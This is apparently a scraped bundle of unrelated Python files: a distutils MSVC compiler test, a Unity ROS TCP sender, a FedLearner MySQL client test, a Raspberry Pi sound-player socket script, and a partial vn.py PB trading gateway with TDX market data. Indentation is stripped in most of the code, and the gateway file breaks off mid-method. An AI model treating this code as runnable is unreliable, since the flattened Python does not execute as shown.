test_var = 'ṰḖṤṪ┅ṼẨṜ'
test_value = '₃⁴₅'
# Ensure we don't early exit from _get_vc_env
old_distutils_use_sdk = os.environ.pop('DISTUTILS_USE_SDK', None)
os.environ[test_var] = test_value
try:
env = _msvccompiler._get_vc_env('x86')
self.assertIn(test_var.lower(), env)
self.assertEqual(test_value, env[test_var.lower()])
finally:
os.environ.pop(test_var)
if old_distutils_use_sdk:
os.environ['DISTUTILS_USE_SDK'] = old_distutils_use_sdk
def test_get_vc2017(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2017
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2017()
if version:
self.assertGreaterEqual(version, 15)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2017 is not installed")
def test_get_vc2015(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2015
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2015()
if version:
self.assertGreaterEqual(version, 14)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2015 is not installed")
class CheckThread(threading.Thread):
exc_info = None
def run(self):
try:
super().run()
except Exception:
self.exc_info = sys.exc_info()
def __bool__(self):
return not self.exc_info
class TestSpawn(unittest.TestCase):
def test_concurrent_safe(self):
"""
Concurrent calls to spawn should have consistent results.
"""
import distutils._msvccompiler as _msvccompiler
compiler = _msvccompiler.MSVCCompiler()
compiler._paths = "expected"
inner_cmd = 'import os; assert os.environ["PATH"] == "expected"'
command = [sys.executable, '-c', inner_cmd]
threads = [
CheckThread(target=compiler.spawn, args=[command])
for n in range(100)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert all(threads)
def test_concurrent_safe_fallback(self):
"""
If CCompiler.spawn has been monkey-patched without support
for an env, it should still execute.
"""
import distutils._msvccompiler as _msvccompiler
from distutils import ccompiler
compiler = _msvccompiler.MSVCCompiler()
compiler._paths = "expected"
def CCompiler_spawn(self, cmd):
"A spawn without an env argument."
assert os.environ["PATH"] == "expected"
with unittest.mock.patch.object(
ccompiler.CCompiler, 'spawn', CCompiler_spawn):
compiler.spawn(["n/a"])
assert os.environ.get("PATH") != "expected"
def test_suite():
return unittest.TestLoader().loadTestsFromTestCase(msvccompilerTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
|
tcp_sender.py
|
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import socket
import time
import threading
import struct
from .client import ClientThread
from .thread_pauser import ThreadPauser
from io import BytesIO
# queue module was renamed between python 2 and 3
try:
from queue import Queue
from queue import Empty
except:
from Queue import Queue
from Queue import Empty
class UnityTcpSender:
"""
Sends messages to Unity.
"""
def __init__(self):
# if we have a valid IP at this point, it was overridden locally so always use that
self.sender_id = 1
self.time_between_halt_checks = 5
# Each sender thread has its own queue: this is always the queue for the currently active thread.
self.queue = None
self.queue_lock = threading.Lock()
# variables needed for matching up unity service requests with responses
self.next_srv_id = 1001
self.srv_lock = threading.Lock()
self.services_waiting = {}
def send_unity_info(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__log", command)
self.queue.put(serialized_bytes)
def send_unity_warning(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__warn", command)
self.queue.put(serialized_bytes)
def send_unity_error(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__error", command)
self.queue.put(serialized_bytes)
def send_ros_service_response(self, srv_id, destination, response):
if self.queue is not None:
command = SysCommand_Service()
command.srv_id = srv_id
serialized_bytes = ClientThread.serialize_command("__response", command)
self.queue.put(serialized_bytes)
self.send_unity_message(destination, response)
def send_unity_message(self, topic, message):
if self.queue is not None:
serialized_message = ClientThread.serialize_message(topic, message)
self.queue.put(serialized_message)
def send_unity_service_request(self, topic, service_class, request):
if self.queue is None:
return None
thread_pauser = ThreadPauser()
with self.srv_lock:
srv_id = self.next_srv_id
self.next_srv_id += 1
self.services_waiting[srv_id] = thread_pauser
command = SysCommand_Service()
command.srv_id = srv_id
serialized_bytes = ClientThread.serialize_command("__request", command)
self.queue.put(serialized_bytes)
self.send_unity_message(topic, request)
# rospy starts a new thread for each service request,
# so it won't break anything if we sleep now while waiting for the response
thread_pauser.sleep_until_resumed()
response = service_class._response_class().deserialize(thread_pauser.result)
return response
def send_unity_service_response(self, srv_id, data):
thread_pauser = None
with self.srv_lock:
thread_pauser = self.services_waiting[srv_id]
del self.services_waiting[srv_id]
thread_pauser.resume_with_result(data)
def send_topic_list(self):
if self.queue is not None:
topic_list = SysCommand_TopicsResponse()
topics_and_types = rospy.get_published_topics()
topic_list.topics = [item[0] for item in topics_and_types]
topic_list.types = [item[1] for item in topics_and_types]
serialized_bytes = ClientThread.serialize_command("__topic_list", topic_list)
self.queue.put(serialized_bytes)
def start_sender(self, conn, halt_event):
sender_thread = threading.Thread(
target=self.sender_loop, args=(conn, self.sender_id, halt_event)
)
self.sender_id += 1
# Exit the server thread when the main thread terminates
sender_thread.daemon = True
sender_thread.start()
def sender_loop(self, conn, tid, halt_event):
s = None
local_queue = Queue()
# send an empty message to confirm connection
# minimal message: 4 zero bytes for topic length 0, 4 zero bytes for payload length 0
local_queue.put(b"\0\0\0\0\0\0\0\0")
with self.queue_lock:
self.queue = local_queue
try:
while not halt_event.is_set():
try:
item = local_queue.get(timeout=self.time_between_halt_checks)
except Empty:
# I'd like to just wait on the queue, but we also need to check occasionally for the connection being closed
# (otherwise the thread never terminates.)
continue
# print("Sender {} sending an item".format(tid))
try:
conn.sendall(item)
except Exception as e:
rospy.logerr("Exception on Send {}".format(e))
break
finally:
halt_event.set()
with self.queue_lock:
if self.queue is local_queue:
self.queue = None
class SysCommand_Log:
text = ""
class SysCommand_Service:
srv_id = 0
class SysCommand_TopicsResponse:
topics = []
types = []
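# A minimal usage sketch: hand an accepted socket and a shared halt event to
# UnityTcpSender so it can start streaming queued messages to Unity. Both
# `connection` and `halt_event` are assumptions supplied by the caller
# (typically the TCP server loop); illustrative only and never called here.
def _example_start_sender(connection, halt_event):
    sender = UnityTcpSender()
    # Spawns a daemon thread that drains the per-connection queue and writes
    # each serialized message to `connection`.
    sender.start_sender(connection, halt_event)
    sender.send_unity_info("ROS side connected")
    return sender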
|
test_mysql_client.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import unittest
import threading
import time
from fedlearner.common import mysql_client
class TestMySQLClient(unittest.TestCase):
def test_mysql_op(self):
cli = mysql_client.DBClient('test_cluster', 'localhost:2379',
'test_user', 'test_password',
'data_source_a', True)
cli.delete('fl_key')
cli.set_data('fl_key', 'fl_value')
self.assertEqual(cli.get_data('fl_key'), b'fl_value')
self.assertFalse(cli.cas('fl_key', 'fl_value1', 'fl_value2'))
self.assertTrue(cli.cas('fl_key', 'fl_value', 'fl_value1'))
self.assertEqual(cli.get_data('fl_key'), b'fl_value1')
def thread_routine():
cli.set_data('fl_key', 'fl_value2')
self.assertEqual(cli.get_data('fl_key'), b'fl_value2')
other = threading.Thread(target=thread_routine)
other.start()
other.join()
cli.set_data('fl_key/a', '1')
cli.set_data('fl_key/b', '2')
cli.set_data('fl_key/c', '3')
expected_kvs = [(b'fl_key', b'fl_value2'), (b'fl_key/a', b'1'),
(b'fl_key/b', b'2'), (b'fl_key/c', b'3')]
for idx, kv in enumerate(cli.get_prefix_kvs('fl_key')):
self.assertEqual(kv[0], expected_kvs[idx][0])
self.assertEqual(kv[1], expected_kvs[idx][1])
for idx, kv in enumerate(cli.get_prefix_kvs('fl_key', True)):
self.assertEqual(kv[0], expected_kvs[idx+1][0])
self.assertEqual(kv[1], expected_kvs[idx+1][1])
if __name__ == '__main__':
unittest.main()
|
progSound.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pygame import mixer
import threading, random, socket
play = 0
file = 0
sock = socket.socket()
sock.bind(('', 6000))
sock.listen(1)
conn, addr = sock.accept()
#sock.settimeout(.01)
def soundPlayer(arg3, soundPlayer_stop):
global file
global play
while 1:
if play == 1:
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+str(file)+".MP3")
print file
mixer.music.play()
while mixer.music.get_busy() == True:
if play==0:
mixer.music.stop()
continue
file = random.randint(0, 10) #Random sound
#play = 0
soundPlayer_stop = threading.Event()
# Use a separate name for the thread object so it does not shadow the worker function.
soundPlayerThread = threading.Thread(target=soundPlayer, args=(2, soundPlayer_stop))
soundPlayerThread.start()
def simplePlay(file):
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+file+".MP3")
mixer.music.play()
while mixer.music.get_busy() == True:
continue
#simplePlay("ready")
print "> OK. Start!"
print '> Connected:', addr
def reStart():
global conn, addr
conn.close()
conn, addr = sock.accept()
while True:
#data = conn.recv(16384)
data = raw_input()
if not data:
print '> RESTART'
reStart()
if data == 'PLAYsound' and play == 0:
print "> Play sound"
file = str(random.randint(0, 10))
play=1 #On playing
if data == 'STOPsound':
print "> Stop sound"
play = 0
conn.close()
|
pb_gateway.py
|
# Hengtou trading client file-based interface
# 1. Supports reading and writing csv/dbf files
# 2. Uses tdx as the market data source
# Huafu Asset, Li Laijia 28888502
import os
import sys
import copy
import csv
import dbf
import traceback
import pandas as pd
from typing import Any, Dict, List
from datetime import datetime, timedelta
from time import sleep
from functools import lru_cache
from collections import OrderedDict
from multiprocessing.dummy import Pool
from threading import Thread
from pytdx.hq import TdxHq_API
from pytdx.config.hosts import hq_hosts
from pytdx.params import TDXParams
from vnpy.event import EventEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.constant import (
Exchange,
Product,
Direction,
OrderType,
Status,
Offset,
Interval
)
from vnpy.trader.gateway import BaseGateway, LocalOrderManager
from vnpy.trader.object import (
BarData,
CancelRequest,
OrderRequest,
SubscribeRequest,
TickData,
ContractData,
OrderData,
TradeData,
PositionData,
AccountData,
HistoryRequest
)
from vnpy.trader.utility import get_folder_path, print_dict, extract_vt_symbol, get_stock_exchange, append_data
from vnpy.data.tdx.tdx_common import get_stock_type_sz, get_stock_type_sh
# TDX (TongDaXin) stock market data
from vnpy.data.tdx.tdx_common import get_cache_config, get_tdx_market_code
# symbol <=> Chinese name
symbol_name_map: Dict[str, str] = {}
# symbol <=> exchange
symbol_exchange_map: Dict[str, Exchange] = {}
# timestamp alignment
TIME_GAP = 8 * 60 * 60 * 1000000000
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
# function <-> file name mapping
PB_FILE_NAMES = {
'send_order': 'XHPT_WT', # generic interface: order placement
'cancel_order': 'XHPT_CD', # generic interface: order cancellation
'update_orders': 'XHPT_WTCX', # generic interface: order query
'update_trades': 'XHPT_CJCX', # generic interface: trade query
'positions': 'CC_STOCK_', # position details
'orders': 'WT_STOCK_', # today's order details
'trades': 'CJ_STOCK_', # today's trade details
'accounts': 'ZJ_STOCK_' # account funds
}
SEND_ORDER_FIELDS = OrderedDict({
"CPBH": "C32", # product code / fund code <-- input parameters -->
"ZCDYBH": "C16", # asset unit code / portfolio code
"ZHBH": "C16", # portfolio code
"GDDM": "C20", # shareholder code
"JYSC": "C3", # trading market
"ZQDM": "C16", # security code
"WTFX": "C4", # order direction
"WTJGLX": "C1", # order price type
"WTJG": "N11.4", # order price
"WTSL": "N12", # order volume
"WBZDYXH": "N9", # third-party system custom id
"WTXH": "N8", # order sequence number <-- output parameters -->
"WTSBDM": "N8", # order failure code
"SBYY": "C254", # failure reason
"CLBZ": "C1", # processing flag <-- internal fields -->
"BYZD": "C2", # reserved field
"WTJE": "N16.2", # order amount <-- extended parameters -->
"TSBS": "C64", # special flag
"YWBS": "C2", # business flag
})
# cancel-order csv field format definition
CANCEL_ORDER_FIELDS = OrderedDict({
"WTXH": "N8", # order sequence number
"JYSC": "C3", # trading market
"ZQDM": "C16", # security code
"CDCGBZ": "C1", # cancel success flag
"SBYY": "C254", # failure reason
"CLBZ": "C1", # processing flag
"BYZD": "C2", # reserved field
"BYZD2": "C16", # reserved field 2
})
# generic interface: order query
UPDATE_ORDER_FIELDS = OrderedDict({
"WTRQ": "N8", # order date
"WTSJ": "N6", # order time
"WTXH": "N8", # order sequence number
"WBZDYXH": "N9", # third-party system custom id
"CPBH": "C32", # product (account) code
"ZCDYBH": "C16", # asset unit code
"ZHBH": "C16", # portfolio code
"GDDM": "C20", # shareholder code
"JYSC": "C3", # trading market
"ZQDM": "C16", # security code
"WTFX": "C4", # order direction
"WTJGLX": "C1", # order price type
"WTJG": "N11.4", # order price
"WTSL": "N12", # order volume
"YMDJJE": "N16.2", # estimated buy frozen amount
"YMSRJE": "N16.2", # estimated sell income amount
"WTZT": "C1", # order status
"WTCCSL": "N12", # cancelled volume
"FDYY": "C254", # rejection reason
"JYSSBBH": "C64", # exchange declaration number
"CLBZ": "C1", # processing flag
"BYZD": "C2", # reserved field
"WTJE": "N16.2", # order amount
"TSBS": "C64", # special flag
})
# generic interface: trade query
UPDATE_TRADE_FIELDS = OrderedDict({
"CJRQ": "N8", # trade date
"CJBH": "C64", # trade sequence number
"WTXH": "N8", # order sequence number
"WBZDYXH": "N9", # third-party system custom id
"CPBH": "C32", # product (account) code
"ZCDYBH": "C16", # asset unit code
"ZHBH": "C16", # portfolio code
"GDDM": "C20", # shareholder code
"JYSC": "C3", # trading market
"ZQDM": "C16", # security code
"WTFX": "C4", # order direction
"CJSL": "N16", # traded volume
"CJJG": "N11.4", # traded price
"CJJE": "N16.2", # traded amount
"ZFY": "N16.2", # total fees
"CJSJ": "N6", # trade time
"CLBZ": "C1", # processing flag
"BYZD": "C2", # reserved field
"TSBS": "C64", # special flag
"JYSCJBH": "C64", # exchange trade number
})
# 交易所id <=> Exchange
EXCHANGE_PB2VT: Dict[str, Exchange] = {
"1": Exchange.SSE,
"2": Exchange.SZSE,
"3": Exchange.SHFE,
"4": Exchange.CZCE,
"7": Exchange.CFFEX,
"9": Exchange.DCE,
"k": Exchange.INE
}
EXCHANGE_VT2PB: Dict[Exchange, str] = {v: k for k, v in EXCHANGE_PB2VT.items()}
EXCHANGE_NAME2VT: Dict[str, Exchange] = {
"上交所A": Exchange.SSE,
"深交所A": Exchange.SZSE
}
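# Small illustrative check (documentation only, never called by the gateway): the numeric market
# codes from the XHPT files and the Chinese market names from the account export files resolve
# to the same vn.py Exchange values.
def _demo_exchange_mapping():
    assert EXCHANGE_PB2VT["1"] == Exchange.SSE
    assert EXCHANGE_NAME2VT["深交所A"] == Exchange.SZSE
    assert EXCHANGE_VT2PB[Exchange.SSE] == "1"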
# 方向 <=> Direction, Offset
DIRECTION_STOCK_PB2VT: Dict[str, Any] = {
"1": (Direction.LONG, Offset.NONE), # 买
"2": (Direction.SHORT, Offset.NONE), # 卖
"V": (Direction.LONG, Offset.OPEN), # 多,开
"X": (Direction.SHORT, Offset.OPEN), # 空,开
"Y": (Direction.LONG, Offset.CLOSE), # 多,平
"W": (Direction.SHORT, Offset.CLOSE) # 空, 平
}
DIRECTION_STOCK_VT2PB: Dict[Any, str] = {v: k for k, v in DIRECTION_STOCK_PB2VT.items()}
DIRECTION_STOCK_NAME2VT: Dict[str, Any] = {
"卖出": Direction.SHORT,
"买入": Direction.LONG,
"债券买入": Direction.LONG,
"债券卖出": Direction.SHORT,
"申购": Direction.LONG
}
DIRECTION_ORDER_PB2VT: Dict[str, Any] = {
"1": Direction.LONG,
"2": Direction.SHORT,
"3": Direction.LONG,
"4": Direction.SHORT
}
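# Minimal sketch (illustrative only, not used elsewhere): mapping a vn.py (Direction, Offset)
# pair to the PB direction code and back, as send_order_dbf()/send_order_csv() do further below.
def _demo_direction_mapping():
    pb_code = DIRECTION_STOCK_VT2PB[(Direction.LONG, Offset.NONE)]  # -> "1" (买)
    vt_pair = DIRECTION_STOCK_PB2VT[pb_code]                        # -> (Direction.LONG, Offset.NONE)
    return pb_code, vt_pair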
# 持仓方向 <=> Direction
POSITION_DIRECTION_PB2VT = {
"1": Direction.LONG,
"2": Direction.SHORT,
}
# 委托单类型
ORDERTYPE_PB2VT: Dict[str, OrderType] = {
"0": OrderType.LIMIT, # 限价单
"a": OrderType.MARKET, # 五档即成剩撤(上交所市价)
"b": OrderType.MARKET, # 五档即成剩转(上交所市价)
"A": OrderType.MARKET, # 五档即成剩撤(深交所市价)
"C": OrderType.MARKET, # 即成剩撤(深交所市价)
"D": OrderType.MARKET, # 对手方最优(深交所市价,上交所科创板市价)
"E": OrderType.MARKET, # 本方最优(深交所市价,上交所科创板市价)
}
def format_dict(d, dict_define):
"""根据dict格式定义进行value转换"""
for k in dict_define.keys():
# 原值
v = d.get(k, '')
# 目标转换格式
v_format = dict_define.get(k, None)
if v_format is None:
continue
if 'C' in v_format:
str_len = int(v_format.replace('C', ''))
new_v = '{}{}'.format(' ' * (str_len - len(v)), v)
d.update({k: new_v})
continue
elif "N" in v_format:
v_format = v_format.replace('N', '')
if '.' in v_format:
int_len, float_len = v_format.split('.')
int_len = int(int_len)
float_len = int(float_len)
str_v = str(v)
new_v = '{}{}'.format(' ' * (int_len - len(str_v)), str_v)
else:
int_len = int(v_format)
str_v = str(v)
new_v = '{}{}'.format(' ' * (int_len - len(str_v)), str_v)
d.update({k: new_v})
return d
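# Hedged example of format_dict(): pad a few send-order values to the fixed widths declared in
# SEND_ORDER_FIELDS ('C16' = 16-char text field, 'N11.4'/'N12' = numeric fields). The code, price
# and volume below are made-up sample values.
def _demo_format_dict():
    raw = {"ZQDM": "600000", "WTJG": 10.5, "WTSL": 1000}
    padded = format_dict(raw, {k: SEND_ORDER_FIELDS[k] for k in raw})
    # e.g. "ZQDM" ('C16') becomes "          600000": left-padded with spaces to 16 characters
    return padded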
def get_pb_order_type(exchange, order_type):
"""获取pb的委托类型"""
# 限价单
if order_type == OrderType.LIMIT:
return "0"
# 市价单
if exchange == Exchange.SSE:
return "a"
if exchange == Exchange.SZSE:
return "C"
return "0"
ORDERTYPE_NAME2VT: Dict[str, OrderType] = {
"五档即成剩撤": OrderType.MARKET,
"五档即成剩转": OrderType.MARKET,
"即成剩撤": OrderType.MARKET,
"对手方最优": OrderType.MARKET,
"本方最优": OrderType.MARKET,
"限价单": OrderType.LIMIT,
}
STATUS_NAME2VT: Dict[str, Status] = {
"未报": Status.SUBMITTING,
"待报": Status.SUBMITTING,
"正报": Status.SUBMITTING,
"已报": Status.NOTTRADED,
"废单": Status.REJECTED,
"部成": Status.PARTTRADED,
"已成": Status.ALLTRADED,
"部撤": Status.CANCELLED,
"已撤": Status.CANCELLED,
"待撤": Status.CANCELLING,
"未审批": Status.UNKNOWN,
"审批拒绝": Status.UNKNOWN,
"未审批即撤销": Status.UNKNOWN,
}
STATUS_PB2VT: Dict[str, Status] = {
"1": Status.SUBMITTING,
"2": Status.SUBMITTING,
"3": Status.SUBMITTING,
"4": Status.NOTTRADED,
"5": Status.REJECTED,
"6": Status.PARTTRADED,
"7": Status.ALLTRADED,
"8": Status.CANCELLED,
"9": Status.CANCELLED,
"a": Status.CANCELLING,
"b": Status.UNKNOWN,
"c": Status.UNKNOWN,
"d": Status.UNKNOWN,
}
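# Quick sketch (documentation only): both the Chinese status names exported in the account files
# and the single-character codes in the XHPT query files resolve to the same vn.py Status values.
def _demo_status_mapping(name: str = "已成", code: str = "7"):
    return STATUS_NAME2VT.get(name, Status.UNKNOWN), STATUS_PB2VT.get(code, Status.UNKNOWN)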
STOCK_CONFIG_FILE = 'tdx_stock_config.pkb2'
class PbGateway(BaseGateway):
default_setting: Dict[str, Any] = {
"资金账号": "",
"数据目录": "",
"产品编号": "",
"单元编号": "",
"股东代码_沪": "",
"股东代码_深": "",
"文件格式": "dbf",
"导出子目录": "数据导出",
"pb版本": "2018"
}
    # 接口支持的交易所清单
exchanges: List[Exchange] = list(EXCHANGE_VT2PB.keys())
def __init__(self, event_engine: EventEngine, gateway_name='PB'):
""""""
super().__init__(event_engine, gateway_name=gateway_name)
self.connect_time = datetime.now().strftime("%H%M")
self.order_manager = LocalOrderManager(self, self.connect_time, 4)
self.md_api = PbMdApi(self)
self.td_api = PbTdApi(self)
self.tq_api = None
        self.tdx_connected = False  # 通达信行情API的连接状态
self.file_type = 'dbf'
self.pb_version = '2018'
def connect(self, setting: dict) -> None:
""""""
userid = setting["资金账号"]
csv_folder = setting["数据目录"]
product_id = setting["产品编号"]
unit_id = setting["单元编号"]
holder_ids = {
Exchange.SSE: setting["股东代码_沪"],
Exchange.SZSE: setting["股东代码_深"]
}
self.file_type = setting.get('文件格式', 'dbf')
self.pb_version = setting.get('pb版本', '2018')
# 2019版,导出目录,自动增加一个‘数据导出’的子文件夹
# 2018版,导出目录,无自动增加的子目录
export_sub_folder = setting.get('导出子目录', '数据导出')
if len(export_sub_folder) > 0:
# 2019款
export_folder = os.path.abspath(os.path.join(csv_folder, export_sub_folder))
else:
# 2018款
export_folder = csv_folder
self.md_api.connect()
self.td_api.connect(user_id=userid,
order_folder=csv_folder,
account_folder=export_folder,
product_id=product_id,
unit_id=unit_id,
holder_ids=holder_ids)
#self.tq_api = TqMdApi(self)
#self.tq_api.connect()
self.init_query()
def close(self) -> None:
""""""
self.md_api.close()
self.td_api.close()
def subscribe(self, req: SubscribeRequest) -> None:
""""""
if self.tq_api and self.tq_api.is_connected:
self.tq_api.subscribe(req)
else:
self.md_api.subscribe(req)
def send_order(self, req: OrderRequest) -> str:
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest) -> None:
""""""
self.td_api.cancel_order(req)
def query_account(self) -> None:
""""""
self.td_api.query_account()
def query_position(self) -> None:
""""""
self.td_api.query_position()
def query_orders(self) -> None:
self.td_api.query_orders()
def query_trades(self) -> None:
self.td_api.query_trades()
def process_timer_event(self, event) -> None:
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self) -> None:
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
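# A minimal, hedged usage sketch of PbGateway. All paths, account and holder values below are
# placeholders, not real configuration; the PB client must already export its data files into
# the configured directories for the gateway to pick them up.
def _demo_connect_pb_gateway():
    event_engine = EventEngine()
    gateway = PbGateway(event_engine)
    gateway.connect({
        "资金账号": "10001",
        "数据目录": r"C:\PB\文件单",
        "产品编号": "PROD01",
        "单元编号": "1",
        "股东代码_沪": "A123456789",
        "股东代码_深": "0123456789",
        "文件格式": "dbf",
        "导出子目录": "数据导出",  # use "" for the 2018 client layout (no sub-folder)
        "pb版本": "2019",
    })
    return gateway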
class PbMdApi(object):
def __init__(self, gateway: PbGateway):
""""""
super().__init__()
self.gateway: PbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.connect_status: bool = False
self.login_status: bool = False
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_vn_dict = {} # tdx合约与vtSymbol的对应
        self.symbol_tick_dict = {}  # tdx合约与最后一个Tick的字典
self.registed_symbol_set = set()
self.config = get_cache_config(STOCK_CONFIG_FILE)
self.symbol_dict = self.config.get('symbol_dict', {})
self.cache_time = self.config.get('cache_time', datetime.now() - timedelta(days=7))
self.commission_dict = {}
self.contract_dict = {}
# self.queue = Queue() # 请求队列
self.pool = None # 线程池
# self.req_thread = None # 定时器线程
# copy.copy(hq_hosts)
self.ip_list = [{'ip': "180.153.18.170", 'port': 7709},
{'ip': "180.153.18.171", 'port': 7709},
{'ip': "180.153.18.172", 'port': 80},
{'ip': "202.108.253.130", 'port': 7709},
{'ip': "202.108.253.131", 'port': 7709},
{'ip': "202.108.253.139", 'port': 80},
{'ip': "60.191.117.167", 'port': 7709},
{'ip': "115.238.56.198", 'port': 7709},
{'ip': "218.75.126.9", 'port': 7709},
{'ip': "115.238.90.165", 'port': 7709},
{'ip': "124.160.88.183", 'port': 7709},
{'ip': "60.12.136.250", 'port': 7709},
{'ip': "218.108.98.244", 'port': 7709},
# {'ip': "218.108.47.69", 'port': 7709},
{'ip': "114.80.63.12", 'port': 7709},
{'ip': "114.80.63.35", 'port': 7709},
{'ip': "180.153.39.51", 'port': 7709},
# {'ip': '14.215.128.18', 'port': 7709},
# {'ip': '59.173.18.140', 'port': 7709}
]
self.best_ip = {'ip': None, 'port': None}
self.api_dict = {} # API 的连接会话对象字典
self.last_tick_dt = {} # 记录该会话对象的最后一个tick时间
self.security_count = 50000
# 股票code name列表
self.stock_codelist = None
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_security_count(TDXParams.MARKET_SZ) > 9000: # 0:深市 股票数量 = 9260
_timestamp = datetime.now() - __time1
self.gateway.write_log('服务器{}:{},耗时:{}'.format(ip, port, _timestamp))
return _timestamp
else:
self.gateway.write_log(u'该服务器IP {}无响应'.format(ip))
return timedelta(9, 9, 0)
except:
self.gateway.write_error(u'tdx ping服务器,异常的响应{}'.format(ip))
return timedelta(9, 9, 0)
def select_best_ip(self):
"""
选择行情服务器
:return:
"""
self.gateway.write_log(u'选择通达信股票行情服务器')
data_future = [self.ping(x.get('ip'), x.get('port')) for x in self.ip_list]
best_future_ip = self.ip_list[data_future.index(min(data_future))]
self.gateway.write_log(u'选取 {}:{}'.format(
best_future_ip['ip'], best_future_ip['port']))
return best_future_ip
def connect(self, n=3):
"""
连接通达讯行情服务器
:param n:
:return:
"""
if self.connection_status:
            for api in self.api_dict.values():
                if api is not None and getattr(api, "client", None) is not None:
self.gateway.write_log(u'当前已经连接,不需要重新连接')
return
        self.gateway.write_log(u'开始连接通达信行情服务器')
if len(self.symbol_dict) == 0:
self.gateway.write_error(f'本地没有股票信息的缓存配置文件')
else:
self.cov_contracts()
# 选取最佳服务器
if self.best_ip['ip'] is None and self.best_ip['port'] is None:
self.best_ip = self.select_best_ip()
# 创建n个api连接对象实例
for i in range(n):
try:
api = TdxHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = api.get_security_count(TDXParams.MARKET_SZ)
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'创建第{}个tdx连接'.format(i + 1))
self.api_dict[i] = api
self.last_tick_dt[i] = datetime.now()
self.connection_status = True
self.security_count = c
# if len(symbol_name_map) == 0:
# self.get_stock_list()
except Exception as ex:
self.gateway.write_error(u'连接服务器tdx[{}]异常:{},{}'.format(i, str(ex), traceback.format_exc()))
return
# 创建连接池,每个连接都调用run方法
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
# 设置上层的连接状态
        self.gateway.tdx_connected = True
def reconnect(self, i):
"""
重连
:param i:
:return:
"""
try:
self.best_ip = self.select_best_ip()
api = TdxHq_API(heartbeat=True, auto_retry=True)
api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = api.get_security_count(TDXParams.MARKET_SZ)
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'重新创建第{}个tdx连接'.format(i + 1))
self.api_dict[i] = api
sleep(1)
except Exception as ex:
self.gateway.write_error(u'重新连接服务器tdx[{}]异常:{},{}'.format(i, str(ex), traceback.format_exc()))
return
def close(self):
"""退出API"""
self.connection_status = False
# 设置上层的连接状态
        self.gateway.tdx_connected = False
if self.pool is not None:
self.pool.close()
self.pool.join()
def subscribe(self, req):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(req.symbol)
if '.' in vn_symbol:
vn_symbol = vn_symbol.split('.')[0]
self.gateway.write_log(u'通达信行情订阅 {}'.format(str(vn_symbol)))
tdx_symbol = vn_symbol # [0:-2] + 'L9'
tdx_symbol = tdx_symbol.upper()
self.gateway.write_log(u'{}=>{}'.format(vn_symbol, tdx_symbol))
self.symbol_vn_dict[tdx_symbol] = vn_symbol
if tdx_symbol not in self.registed_symbol_set:
self.registed_symbol_set.add(tdx_symbol)
# 查询股票信息
self.qry_instrument(vn_symbol)
self.check_status()
def check_status(self):
# self.gateway.write_log(u'检查tdx接口状态')
if len(self.registed_symbol_set) == 0:
return True
# 若还没有启动连接,就启动连接
over_time = [((datetime.now() - dt).total_seconds() > 60) for dt in self.last_tick_dt.values()]
if not self.connection_status or len(self.api_dict) == 0 or any(over_time):
self.gateway.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
